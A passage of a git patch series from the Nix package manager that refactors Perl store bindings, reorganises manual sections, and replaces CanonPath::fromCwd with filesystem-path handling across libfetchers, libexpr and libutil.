std::string(baseNameOf(srcPath)), accessor, CanonPath::fromCwd(srcPath), method, parseHashAlgo(algo)); - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * makeFixedOutputPath(int recursive, char * algo, char * hash, char * name) +SV * +StoreWrapper::makeFixedOutputPath(int recursive, char * algo, char * hash, char * name) PPCODE: try { auto h = Hash::parseAny(hash, parseHashAlgo(algo)); auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - auto path = store()->makeFixedOutputPath(name, FixedOutputInfo { + auto path = THIS->store->makeFixedOutputPath(name, FixedOutputInfo { .method = method, .hash = h, .references = {}, }); - XPUSHs(sv_2mortal(newSVpv(store()->printStorePath(path).c_str(), 0))); + XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(path).c_str(), 0))); } catch (Error & e) { croak("%s", e.what()); } -SV * derivationFromPath(char * drvPath) +SV * +StoreWrapper::derivationFromPath(char * drvPath) PREINIT: HV *hash; CODE: try { - Derivation drv = store()->derivationFromPath(store()->parseStorePath(drvPath)); + Derivation drv = THIS->store->derivationFromPath(THIS->store->parseStorePath(drvPath)); hash = newHV(); HV * outputs = newHV(); - for (auto & i : drv.outputsAndOptPaths(*store())) { + for (auto & i : drv.outputsAndOptPaths(*THIS->store)) { hv_store( outputs, i.first.c_str(), i.first.size(), !i.second.second ? newSV(0) /* null value */ - : newSVpv(store()->printStorePath(*i.second.second).c_str(), 0), + : newSVpv(THIS->store->printStorePath(*i.second.second).c_str(), 0), 0); } hv_stores(hash, "outputs", newRV((SV *) outputs)); AV * inputDrvs = newAV(); for (auto & i : drv.inputDrvs.map) - av_push(inputDrvs, newSVpv(store()->printStorePath(i.first).c_str(), 0)); // !!! ignores i->second + av_push(inputDrvs, newSVpv(THIS->store->printStorePath(i.first).c_str(), 0)); // !!! ignores i->second hv_stores(hash, "inputDrvs", newRV((SV *) inputDrvs)); AV * inputSrcs = newAV(); for (auto & i : drv.inputSrcs) - av_push(inputSrcs, newSVpv(store()->printStorePath(i).c_str(), 0)); + av_push(inputSrcs, newSVpv(THIS->store->printStorePath(i).c_str(), 0)); hv_stores(hash, "inputSrcs", newRV((SV *) inputSrcs)); hv_stores(hash, "platform", newSVpv(drv.platform.c_str(), 0)); @@ -361,10 +415,11 @@ SV * derivationFromPath(char * drvPath) RETVAL -void addTempRoot(char * storePath) +void +StoreWrapper::addTempRoot(char * storePath) PPCODE: try { - store()->addTempRoot(store()->parseStorePath(storePath)); + THIS->store->addTempRoot(THIS->store->parseStorePath(storePath)); } catch (Error & e) { croak("%s", e.what()); } diff --git a/perl/local.mk b/perl/local.mk index 0eae651d8..ed4764eb9 100644 --- a/perl/local.mk +++ b/perl/local.mk @@ -41,3 +41,6 @@ Store_FORCE_INSTALL = 1 Store_INSTALL_DIR = $(perllibdir)/auto/Nix/Store clean-files += lib/Nix/Config.pm lib/Nix/Store.cc Makefile.config + +check: all + yath test diff --git a/perl/t/init.t b/perl/t/init.t new file mode 100644 index 000000000..80197e013 --- /dev/null +++ b/perl/t/init.t @@ -0,0 +1,13 @@ +use strict; +use warnings; +use Test2::V0; + +use Nix::Store; + +my $s = new Nix::Store("dummy://"); + +my $res = $s->isValidPath("/nix/store/g1w7hy3qg1w7hy3qg1w7hy3qg1w7hy3q-bar"); + +ok(!$res, "should not have path"); + +done_testing; From 140de3b2780c6c49030b118051e15f32d202bc49 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Thu, 8 Feb 2024 09:00:00 +0100 Subject: [PATCH 409/654] manual: fold sidebar sections the table of contents is very long now, and folded sections allow for a better overview. --- doc/manual/book.toml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/doc/manual/book.toml b/doc/manual/book.toml index 73fb7e75e..d524dbb13 100644 --- a/doc/manual/book.toml +++ b/doc/manual/book.toml @@ -6,6 +6,8 @@ additional-css = ["custom.css"] additional-js = ["redirects.js"] edit-url-template = "https://github.com/NixOS/nix/tree/master/doc/manual/{path}" git-repository-url = "https://github.com/NixOS/nix" +fold.enable = true +fold.level = 1 [preprocessor.anchors] renderers = ["html"] From e486b76eef135cdb1f112b9bb2ffcbf6a08f7c96 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Thu, 8 Feb 2024 09:08:58 +0100 Subject: [PATCH 410/654] move JSON section into Formats and Protocols --- doc/manual/src/SUMMARY.md.in | 8 ++++---- doc/manual/src/_redirects | 1 + doc/manual/src/{ => protocols}/json/derivation.md | 0 doc/manual/src/{ => protocols}/json/store-object-info.md | 5 +++-- src/nix/derivation-add.md | 2 +- src/nix/derivation-show.md | 2 +- 6 files changed, 10 insertions(+), 8 deletions(-) rename doc/manual/src/{ => protocols}/json/derivation.md (100%) rename doc/manual/src/{ => protocols}/json/store-object-info.md (96%) diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index 695d63dfc..167f54206 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -104,10 +104,10 @@ - [Channels](command-ref/files/channels.md) - [Default Nix expression](command-ref/files/default-nix-expression.md) - [Architecture and Design](architecture/architecture.md) -- [JSON Formats](json/index.md) - - [Store Object Info](json/store-object-info.md) - - [Derivation](json/derivation.md) -- [Protocols](protocols/index.md) +- [Formats and Protocols](protocols/index.md) + - [JSON Formats](protocols/json/index.md) + - [Store Object Info](protocols/json/store-object-info.md) + - [Derivation](protocols/json/derivation.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) - [Glossary](glossary.md) diff --git a/doc/manual/src/_redirects b/doc/manual/src/_redirects index 62c693c97..8bf0e854b 100644 --- a/doc/manual/src/_redirects +++ b/doc/manual/src/_redirects @@ -36,5 +36,6 @@ /package-management/s3-substituter /store/types/s3-binary-cache-store 301! /protocols/protocols /protocols 301! +/json/* /protocols/json/:splat 301! /release-notes/release-notes /release-notes 301! diff --git a/doc/manual/src/json/derivation.md b/doc/manual/src/protocols/json/derivation.md similarity index 100% rename from doc/manual/src/json/derivation.md rename to doc/manual/src/protocols/json/derivation.md diff --git a/doc/manual/src/json/store-object-info.md b/doc/manual/src/protocols/json/store-object-info.md similarity index 96% rename from doc/manual/src/json/store-object-info.md rename to doc/manual/src/protocols/json/store-object-info.md index db43c2fa1..ba4ab098f 100644 --- a/doc/manual/src/json/store-object-info.md +++ b/doc/manual/src/protocols/json/store-object-info.md @@ -14,11 +14,11 @@ Info about a [store object]. * `narHash`: - Hash of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + Hash of the [file system object] part of the store object when serialized as a [Nix Archive]. * `narSize`: - Size of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + Size of the [file system object] part of the store object when serialized as a [Nix Archive]. * `references`: @@ -30,6 +30,7 @@ Info about a [store object]. [store path]: @docroot@/glossary.md#gloss-store-path [file system object]: @docroot@/store/file-system-object.md +[Nix Archive]: @docroot@/glossary.md#gloss-nar ## Impure fields diff --git a/src/nix/derivation-add.md b/src/nix/derivation-add.md index d9b8467df..331cbdd88 100644 --- a/src/nix/derivation-add.md +++ b/src/nix/derivation-add.md @@ -14,6 +14,6 @@ a Nix expression evaluates. `nix derivation add` takes a single derivation in the following format: -{{#include ../../json/derivation.md}} +{{#include ../../protocols/json/derivation.md}} )"" diff --git a/src/nix/derivation-show.md b/src/nix/derivation-show.md index 884f1adc6..2437ea08f 100644 --- a/src/nix/derivation-show.md +++ b/src/nix/derivation-show.md @@ -52,6 +52,6 @@ By default, this command only shows top-level derivations, but with [store path]: @docroot@/glossary.md#gloss-store-path -{{#include ../../json/derivation.md}} +{{#include ../../protocols/json/derivation.md}} )"" From d24c8aa49141fc384deafee50da65a05553a124b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Thu, 8 Feb 2024 09:22:30 +0100 Subject: [PATCH 411/654] Simplify a conditional in the repl initialisation --- src/libcmd/repl.cc | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 5b4d3f9d5..9826f0fac 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -255,9 +255,7 @@ void NixRepl::mainLoop() notice("Nix %1%%2%\nType :? for help.", nixVersion, debuggerNotice); } - if (isFirstRepl) { - isFirstRepl = false; - } + isFirstRepl = false; loadFiles(); From 0dea16e686e7128efd95a28e2000639bb169125a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?= <7226587+thufschmitt@users.noreply.github.com> Date: Thu, 8 Feb 2024 09:50:12 +0100 Subject: [PATCH 412/654] Mention `OPTIMIZE=0` more prominently in the hacking guide This is a game-changer when developing, it shouldn't just be hidden amongst a list of more advanced variables. --- doc/manual/src/contributing/hacking.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/contributing/hacking.md b/doc/manual/src/contributing/hacking.md index 9e2470859..d36d46620 100644 --- a/doc/manual/src/contributing/hacking.md +++ b/doc/manual/src/contributing/hacking.md @@ -44,13 +44,13 @@ To build Nix itself in this shell: ```console [nix-shell]$ autoreconfPhase [nix-shell]$ configurePhase -[nix-shell]$ make -j $NIX_BUILD_CORES +[nix-shell]$ make -j $NIX_BUILD_CORES OPTIMIZE=0 ``` To install it in `$(pwd)/outputs` and test it: ```console -[nix-shell]$ make install +[nix-shell]$ make install OPTIMIZE=0 [nix-shell]$ make installcheck check -j $NIX_BUILD_CORES [nix-shell]$ nix --version nix (Nix) 2.12 From 4687beecef87b358a514825e3700e47962ca2194 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Tue, 6 Feb 2024 16:23:58 -0500 Subject: [PATCH 413/654] Get rid of `CanonPath::fromCwd` As discussed in the last Nix team meeting (2024-02-95), this method doesn't belong because `CanonPath` is a virtual/ideal absolute path format, not used in file systems beyond the native OS format for which a "current working directory" is defined. Progress towards #9205 --- perl/lib/Nix/Store.xs | 8 ++-- src/libcmd/common-eval-args.cc | 6 +-- src/libcmd/common-eval-args.hh | 2 +- src/libcmd/editor-for.cc | 2 +- src/libcmd/installables.cc | 5 +- src/libcmd/repl.cc | 2 +- src/libexpr/eval.cc | 6 +-- src/libexpr/eval.hh | 5 ++ src/libexpr/paths.cc | 6 ++- src/libfetchers/fs-input-accessor.cc | 64 +++++--------------------- src/libfetchers/fs-input-accessor.hh | 5 +- src/libfetchers/git-utils.cc | 22 ++++----- src/libfetchers/git-utils.hh | 2 +- src/libfetchers/git.cc | 18 ++++---- src/libutil/archive.cc | 4 +- src/libutil/canon-path.cc | 5 -- src/libutil/canon-path.hh | 2 - src/libutil/posix-source-accessor.cc | 45 ++++++++++++++---- src/libutil/posix-source-accessor.hh | 29 +++++++++++- src/libutil/source-accessor.hh | 4 +- src/libutil/source-path.cc | 2 +- src/libutil/source-path.hh | 2 +- src/nix-build/nix-build.cc | 4 +- src/nix-env/nix-env.cc | 2 +- src/nix-instantiate/nix-instantiate.cc | 4 +- src/nix-store/nix-store.cc | 16 +++---- src/nix/add-to-store.cc | 4 +- src/nix/eval.cc | 2 +- src/nix/hash.cc | 4 +- src/nix/prefetch.cc | 5 +- 30 files changed, 152 insertions(+), 135 deletions(-) diff --git a/perl/lib/Nix/Store.xs b/perl/lib/Nix/Store.xs index 6730197b5..4a928594b 100644 --- a/perl/lib/Nix/Store.xs +++ b/perl/lib/Nix/Store.xs @@ -256,9 +256,9 @@ SV * hashPath(char * algo, int base32, char * path) PPCODE: try { - PosixSourceAccessor accessor; + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path); Hash h = hashPath( - accessor, CanonPath::fromCwd(path), + accessor, canonPath, FileIngestionMethod::Recursive, parseHashAlgo(algo)).first; auto s = h.to_string(base32 ? HashFormat::Nix32 : HashFormat::Base16, false); XPUSHs(sv_2mortal(newSVpv(s.c_str(), 0))); @@ -336,10 +336,10 @@ StoreWrapper::addToStore(char * srcPath, int recursive, char * algo) PPCODE: try { auto method = recursive ? FileIngestionMethod::Recursive : FileIngestionMethod::Flat; - PosixSourceAccessor accessor; + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(srcPath); auto path = THIS->store->addToStore( std::string(baseNameOf(srcPath)), - accessor, CanonPath::fromCwd(srcPath), + accessor, canonPath, method, parseHashAlgo(algo)); XPUSHs(sv_2mortal(newSVpv(THIS->store->printStorePath(path).c_str(), 0))); } catch (Error & e) { diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc index 193972272..58f04e225 100644 --- a/src/libcmd/common-eval-args.cc +++ b/src/libcmd/common-eval-args.cc @@ -156,7 +156,7 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state) for (auto & i : autoArgs) { auto v = state.allocValue(); if (i.second[0] == 'E') - state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath(CanonPath::fromCwd()))); + state.mkThunk_(*v, state.parseExprFromString(i.second.substr(1), state.rootPath("."))); else v->mkString(((std::string_view) i.second).substr(1)); res.insert(state.symbols.create(i.first), v); @@ -164,7 +164,7 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state) return res.finish(); } -SourcePath lookupFileArg(EvalState & state, std::string_view s, CanonPath baseDir) +SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir) { if (EvalSettings::isPseudoUrl(s)) { auto storePath = fetchers::downloadTarball( @@ -185,7 +185,7 @@ SourcePath lookupFileArg(EvalState & state, std::string_view s, CanonPath baseDi } else - return state.rootPath(CanonPath(s, baseDir)); + return state.rootPath(baseDir ? absPath(s, *baseDir) : absPath(s)); } } diff --git a/src/libcmd/common-eval-args.hh b/src/libcmd/common-eval-args.hh index 4b403d936..2eb63e15d 100644 --- a/src/libcmd/common-eval-args.hh +++ b/src/libcmd/common-eval-args.hh @@ -29,6 +29,6 @@ private: std::map autoArgs; }; -SourcePath lookupFileArg(EvalState & state, std::string_view s, CanonPath baseDir = CanonPath::fromCwd()); +SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir = nullptr); } diff --git a/src/libcmd/editor-for.cc b/src/libcmd/editor-for.cc index 67653d9c9..6bf36bd64 100644 --- a/src/libcmd/editor-for.cc +++ b/src/libcmd/editor-for.cc @@ -17,7 +17,7 @@ Strings editorFor(const SourcePath & file, uint32_t line) editor.find("vim") != std::string::npos || editor.find("kak") != std::string::npos)) args.push_back(fmt("+%d", line)); - args.push_back(path->abs()); + args.push_back(path->string()); return args; } diff --git a/src/libcmd/installables.cc b/src/libcmd/installables.cc index 736c41a1e..16d25d3cf 100644 --- a/src/libcmd/installables.cc +++ b/src/libcmd/installables.cc @@ -487,10 +487,11 @@ Installables SourceExprCommand::parseInstallables( state->eval(e, *vFile); } else if (file) { - state->evalFile(lookupFileArg(*state, *file, CanonPath::fromCwd(getCommandBaseDir())), *vFile); + auto dir = absPath(getCommandBaseDir()); + state->evalFile(lookupFileArg(*state, *file, &dir), *vFile); } else { - CanonPath dir(CanonPath::fromCwd(getCommandBaseDir())); + Path dir = absPath(getCommandBaseDir()); auto e = state->parseExprFromString(*expr, state->rootPath(dir)); state->eval(e, *vFile); } diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index 4b51fe393..137332895 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -899,7 +899,7 @@ void NixRepl::addVarToScope(const Symbol name, Value & v) Expr * NixRepl::parseString(std::string s) { - return state->parseExprFromString(std::move(s), state->rootPath(CanonPath::fromCwd()), staticEnv); + return state->parseExprFromString(std::move(s), state->rootPath("."), staticEnv); } diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 43f8dea07..eb1b3a5f0 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -434,14 +434,14 @@ EvalState::EvalState( , emptyBindings(0) , rootFS( evalSettings.restrictEval || evalSettings.pureEval - ? ref(AllowListInputAccessor::create(makeFSInputAccessor(CanonPath::root), {}, + ? ref(AllowListInputAccessor::create(makeFSInputAccessor(), {}, [](const CanonPath & path) -> RestrictedPathError { auto modeInformation = evalSettings.pureEval ? "in pure evaluation mode (use '--impure' to override)" : "in restricted mode"; throw RestrictedPathError("access to absolute path '%1%' is forbidden %2%", path, modeInformation); })) - : makeFSInputAccessor(CanonPath::root)) + : makeFSInputAccessor()) , corepkgsFS(makeMemoryInputAccessor()) , internalFS(makeMemoryInputAccessor()) , derivationInternal{corepkgsFS->addFile( @@ -2763,7 +2763,7 @@ Expr * EvalState::parseStdin() // drainFD should have left some extra space for terminators buffer.append("\0\0", 2); auto s = make_ref(std::move(buffer)); - return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath(CanonPath::fromCwd()), staticBaseEnv); + return parse(s->data(), s->size(), Pos::Stdin{.source = s}, rootPath("."), staticBaseEnv); } diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh index 2368187b1..b75646dbd 100644 --- a/src/libexpr/eval.hh +++ b/src/libexpr/eval.hh @@ -372,6 +372,11 @@ public: */ SourcePath rootPath(CanonPath path); + /** + * Variant which accepts relative paths too. + */ + SourcePath rootPath(PathView path); + /** * Allow access to a path. */ diff --git a/src/libexpr/paths.cc b/src/libexpr/paths.cc index 099607638..50d0d9895 100644 --- a/src/libexpr/paths.cc +++ b/src/libexpr/paths.cc @@ -1,5 +1,4 @@ #include "eval.hh" -#include "fs-input-accessor.hh" namespace nix { @@ -8,4 +7,9 @@ SourcePath EvalState::rootPath(CanonPath path) return {rootFS, std::move(path)}; } +SourcePath EvalState::rootPath(PathView path) +{ + return {rootFS, CanonPath(absPath(path))}; +} + } diff --git a/src/libfetchers/fs-input-accessor.cc b/src/libfetchers/fs-input-accessor.cc index 46bc6b70d..ee24c621a 100644 --- a/src/libfetchers/fs-input-accessor.cc +++ b/src/libfetchers/fs-input-accessor.cc @@ -6,72 +6,30 @@ namespace nix { struct FSInputAccessor : InputAccessor, PosixSourceAccessor { - CanonPath root; - - FSInputAccessor(const CanonPath & root) - : root(root) - { - displayPrefix = root.isRoot() ? "" : root.abs(); - } - - void readFile( - const CanonPath & path, - Sink & sink, - std::function sizeCallback) override - { - auto absPath = makeAbsPath(path); - PosixSourceAccessor::readFile(absPath, sink, sizeCallback); - } - - bool pathExists(const CanonPath & path) override - { - return PosixSourceAccessor::pathExists(makeAbsPath(path)); - } - - std::optional maybeLstat(const CanonPath & path) override - { - return PosixSourceAccessor::maybeLstat(makeAbsPath(path)); - } - - DirEntries readDirectory(const CanonPath & path) override - { - DirEntries res; - for (auto & entry : PosixSourceAccessor::readDirectory(makeAbsPath(path))) - res.emplace(entry); - return res; - } - - std::string readLink(const CanonPath & path) override - { - return PosixSourceAccessor::readLink(makeAbsPath(path)); - } - - CanonPath makeAbsPath(const CanonPath & path) - { - return root / path; - } - - std::optional getPhysicalPath(const CanonPath & path) override - { - return makeAbsPath(path); - } + using PosixSourceAccessor::PosixSourceAccessor; }; -ref makeFSInputAccessor(const CanonPath & root) +ref makeFSInputAccessor() { - return make_ref(root); + return make_ref(); +} + +ref makeFSInputAccessor(std::filesystem::path root) +{ + return make_ref(std::move(root)); } ref makeStorePathAccessor( ref store, const StorePath & storePath) { - return makeFSInputAccessor(CanonPath(store->toRealPath(storePath))); + // FIXME: should use `store->getFSAccessor()` + return makeFSInputAccessor(std::filesystem::path { store->toRealPath(storePath) }); } SourcePath getUnfilteredRootPath(CanonPath path) { - static auto rootFS = makeFSInputAccessor(CanonPath::root); + static auto rootFS = makeFSInputAccessor(); return {rootFS, path}; } diff --git a/src/libfetchers/fs-input-accessor.hh b/src/libfetchers/fs-input-accessor.hh index a98e83511..e60906bd8 100644 --- a/src/libfetchers/fs-input-accessor.hh +++ b/src/libfetchers/fs-input-accessor.hh @@ -8,8 +8,9 @@ namespace nix { class StorePath; class Store; -ref makeFSInputAccessor( - const CanonPath & root); +ref makeFSInputAccessor(); + +ref makeFSInputAccessor(std::filesystem::path root); ref makeStorePathAccessor( ref store, diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index 1256a4c2c..cb4a84e53 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -140,15 +140,15 @@ T peelObject(git_repository * repo, git_object * obj, git_object_t type) struct GitRepoImpl : GitRepo, std::enable_shared_from_this { /** Location of the repository on disk. */ - CanonPath path; + std::filesystem::path path; Repository repo; - GitRepoImpl(CanonPath _path, bool create, bool bare) + GitRepoImpl(std::filesystem::path _path, bool create, bool bare) : path(std::move(_path)) { initLibGit2(); - if (pathExists(path.abs())) { + if (pathExists(path.native())) { if (git_repository_open(Setter(repo), path.c_str())) throw Error("opening Git repository '%s': %s", path, git_error_last()->message); } else { @@ -221,10 +221,10 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this return toHash(*oid); } - std::vector parseSubmodules(const CanonPath & configFile) + std::vector parseSubmodules(const std::filesystem::path & configFile) { GitConfig config; - if (git_config_open_ondisk(Setter(config), configFile.abs().c_str())) + if (git_config_open_ondisk(Setter(config), configFile.c_str())) throw Error("parsing .gitmodules file: %s", git_error_last()->message); ConfigIterator it; @@ -296,7 +296,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this /* Get submodule info. */ auto modulesFile = path / ".gitmodules"; - if (pathExists(modulesFile.abs())) + if (pathExists(modulesFile)) info.submodules = parseSubmodules(modulesFile); return info; @@ -389,10 +389,10 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this auto dir = this->path; Strings gitArgs; if (shallow) { - gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--depth", "1", "--", url, refspec }; + gitArgs = { "-C", dir, "fetch", "--quiet", "--force", "--depth", "1", "--", url, refspec }; } else { - gitArgs = { "-C", dir.abs(), "fetch", "--quiet", "--force", "--", url, refspec }; + gitArgs = { "-C", dir, "fetch", "--quiet", "--force", "--", url, refspec }; } runProgram(RunOptions { @@ -438,7 +438,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this .args = { "-c", "gpg.ssh.allowedSignersFile=" + allowedSignersFile, - "-C", path.abs(), + "-C", path, "verify-commit", rev.gitRev() }, @@ -465,7 +465,7 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this } }; -ref GitRepo::openRepo(const CanonPath & path, bool create, bool bare) +ref GitRepo::openRepo(const std::filesystem::path & path, bool create, bool bare) { return make_ref(path, create, bare); } @@ -781,7 +781,7 @@ std::vector> GitRepoImpl::getSubmodules auto rawAccessor = getRawAccessor(rev); - for (auto & submodule : parseSubmodules(CanonPath(pathTemp))) { + for (auto & submodule : parseSubmodules(pathTemp)) { auto rev = rawAccessor->getSubmoduleRev(submodule.path); result.push_back({std::move(submodule), rev}); } diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh index 768554780..e55affb12 100644 --- a/src/libfetchers/git-utils.hh +++ b/src/libfetchers/git-utils.hh @@ -12,7 +12,7 @@ struct GitRepo virtual ~GitRepo() { } - static ref openRepo(const CanonPath & path, bool create = false, bool bare = false); + static ref openRepo(const std::filesystem::path & path, bool create = false, bool bare = false); virtual uint64_t getRevCount(const Hash & rev) = 0; diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc index 26fe79596..bef945d54 100644 --- a/src/libfetchers/git.cc +++ b/src/libfetchers/git.cc @@ -415,7 +415,7 @@ struct GitInputScheme : InputScheme // If this is a local directory and no ref or revision is // given, then allow the use of an unclean working tree. if (!input.getRef() && !input.getRev() && repoInfo.isLocal) - repoInfo.workdirInfo = GitRepo::openRepo(CanonPath(repoInfo.url))->getWorkdirInfo(); + repoInfo.workdirInfo = GitRepo::openRepo(repoInfo.url)->getWorkdirInfo(); return repoInfo; } @@ -429,7 +429,7 @@ struct GitInputScheme : InputScheme if (auto res = cache->lookup(key)) return getIntAttr(*res, "lastModified"); - auto lastModified = GitRepo::openRepo(CanonPath(repoDir))->getLastModified(rev); + auto lastModified = GitRepo::openRepo(repoDir)->getLastModified(rev); cache->upsert(key, Attrs{{"lastModified", lastModified}}); @@ -447,7 +447,7 @@ struct GitInputScheme : InputScheme Activity act(*logger, lvlChatty, actUnknown, fmt("getting Git revision count of '%s'", repoInfo.url)); - auto revCount = GitRepo::openRepo(CanonPath(repoDir))->getRevCount(rev); + auto revCount = GitRepo::openRepo(repoDir)->getRevCount(rev); cache->upsert(key, Attrs{{"revCount", revCount}}); @@ -457,7 +457,7 @@ struct GitInputScheme : InputScheme std::string getDefaultRef(const RepoInfo & repoInfo) const { auto head = repoInfo.isLocal - ? GitRepo::openRepo(CanonPath(repoInfo.url))->getWorkdirRef() + ? GitRepo::openRepo(repoInfo.url)->getWorkdirRef() : readHeadCached(repoInfo.url); if (!head) { warn("could not read HEAD ref from repo at '%s', using 'master'", repoInfo.url); @@ -510,7 +510,7 @@ struct GitInputScheme : InputScheme if (repoInfo.isLocal) { repoDir = repoInfo.url; if (!input.getRev()) - input.attrs.insert_or_assign("rev", GitRepo::openRepo(CanonPath(repoDir))->resolveRef(ref).gitRev()); + input.attrs.insert_or_assign("rev", GitRepo::openRepo(repoDir)->resolveRef(ref).gitRev()); } else { Path cacheDir = getCachePath(repoInfo.url, getShallowAttr(input)); repoDir = cacheDir; @@ -519,7 +519,7 @@ struct GitInputScheme : InputScheme createDirs(dirOf(cacheDir)); PathLocks cacheDirLock({cacheDir}); - auto repo = GitRepo::openRepo(CanonPath(cacheDir), true, true); + auto repo = GitRepo::openRepo(cacheDir, true, true); Path localRefFile = ref.compare(0, 5, "refs/") == 0 @@ -588,7 +588,7 @@ struct GitInputScheme : InputScheme // cache dir lock is removed at scope end; we will only use read-only operations on specific revisions in the remainder } - auto repo = GitRepo::openRepo(CanonPath(repoDir)); + auto repo = GitRepo::openRepo(repoDir); auto isShallow = repo->isShallow(); @@ -664,7 +664,7 @@ struct GitInputScheme : InputScheme for (auto & submodule : repoInfo.workdirInfo.submodules) repoInfo.workdirInfo.files.insert(submodule.path); - auto repo = GitRepo::openRepo(CanonPath(repoInfo.url), false, false); + auto repo = GitRepo::openRepo(repoInfo.url, false, false); auto exportIgnore = getExportIgnoreAttr(input); @@ -703,7 +703,7 @@ struct GitInputScheme : InputScheme } if (!repoInfo.workdirInfo.isDirty) { - auto repo = GitRepo::openRepo(CanonPath(repoInfo.url)); + auto repo = GitRepo::openRepo(repoInfo.url); if (auto ref = repo->getWorkdirRef()) input.attrs.insert_or_assign("ref", *ref); diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index b783b29e0..351ee094b 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -110,8 +110,8 @@ void SourceAccessor::dumpPath( time_t dumpPathAndGetMtime(const Path & path, Sink & sink, PathFilter & filter) { - PosixSourceAccessor accessor; - accessor.dumpPath(CanonPath::fromCwd(path), sink, filter); + auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path); + accessor.dumpPath(canonPath, sink, filter); return accessor.mtime; } diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc index bf948be5d..1223ba33c 100644 --- a/src/libutil/canon-path.cc +++ b/src/libutil/canon-path.cc @@ -20,11 +20,6 @@ CanonPath::CanonPath(const std::vector & elems) push(s); } -CanonPath CanonPath::fromCwd(std::string_view path) -{ - return CanonPath(unchecked_t(), absPath(path)); -} - std::optional CanonPath::parent() const { if (isRoot()) return std::nullopt; diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index fb2d9244b..2f8ff381e 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -52,8 +52,6 @@ public: */ CanonPath(const std::vector & elems); - static CanonPath fromCwd(std::string_view path = "."); - static CanonPath root; /** diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc index 5f26fa67b..0300de01e 100644 --- a/src/libutil/posix-source-accessor.cc +++ b/src/libutil/posix-source-accessor.cc @@ -6,6 +6,33 @@ namespace nix { +PosixSourceAccessor::PosixSourceAccessor(std::filesystem::path && root) + : root(std::move(root)) +{ + assert(root.empty() || root.is_absolute()); + displayPrefix = root; +} + +PosixSourceAccessor::PosixSourceAccessor() + : PosixSourceAccessor(std::filesystem::path {}) +{ } + +std::pair PosixSourceAccessor::createAtRoot(const std::filesystem::path & path) +{ + std::filesystem::path path2 = absPath(path.native()); + return { + PosixSourceAccessor { path2.root_path() }, + CanonPath { static_cast(path2.relative_path()) }, + }; +} + +std::filesystem::path PosixSourceAccessor::makeAbsPath(const CanonPath & path) +{ + return root.empty() + ? (std::filesystem::path { path.abs() }) + : root / path.rel(); +} + void PosixSourceAccessor::readFile( const CanonPath & path, Sink & sink, @@ -13,9 +40,11 @@ void PosixSourceAccessor::readFile( { assertNoSymlinks(path); - AutoCloseFD fd = open(path.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW); + auto ap = makeAbsPath(path); + + AutoCloseFD fd = open(ap.c_str(), O_RDONLY | O_CLOEXEC | O_NOFOLLOW); if (!fd) - throw SysError("opening file '%1%'", path); + throw SysError("opening file '%1%'", ap.native()); struct stat st; if (fstat(fd.get(), &st) == -1) @@ -46,7 +75,7 @@ void PosixSourceAccessor::readFile( bool PosixSourceAccessor::pathExists(const CanonPath & path) { if (auto parent = path.parent()) assertNoSymlinks(*parent); - return nix::pathExists(path.abs()); + return nix::pathExists(makeAbsPath(path)); } std::optional PosixSourceAccessor::cachedLstat(const CanonPath & path) @@ 